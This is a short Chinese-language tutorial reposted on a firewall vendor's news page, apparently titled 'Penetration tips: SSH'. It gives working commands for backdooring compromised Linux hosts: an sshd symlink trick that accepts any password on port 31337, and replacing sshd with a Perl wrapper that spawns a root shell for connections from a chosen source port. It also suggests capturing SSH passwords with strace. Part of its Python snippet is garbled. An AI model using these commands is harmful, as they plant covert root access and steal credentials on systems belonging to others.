威盾防火墙 >> 新闻中心 >> 业界动态 >> 渗透技巧之SSH篇
威盾防火墙 2014-12-30
用些小技巧,蒙蒙菜鸟管理员。
肉鸡上执行
mickey@vic:~
# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。
效果图:
在肉鸡上执行:
[root@localhost ~]
# cd /usr/sbin
[root@localhost sbin]
# mv sshd ../bin
# echo '#!/usr/bin/perl' >sshd
# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
# chmod u+x sshd
# /etc/init.d/sshd restart
在本机执行:
socat STDIO TCP4:10.18.180.20:22,sourceport=13377
如果你想修改源端口,可以用python的struct标准库实现
>>>
import
struct
buffer
=
struct.pack(
'>I6'
,
19526
)
print
repr
(
'\x00\x00LF'
13377
4A
效果图如下:
搞定主机后,往往想记录肉鸡SSH连接到其他主机的密码,进一步扩大战果,使用strace命令就行了。
(C)2005-2016 威盾IIS防火墙 www.WeiDun.com.cn 版权所有 电话:(010)51661195 QQ支持:2600725 京ICP备09032906号
(C)2005-2016 威盾IIS防火墙 www.WeiDun.com.cn 版权所有
电话:(010)51661195 QQ支持:2600725
京ICP备09032906号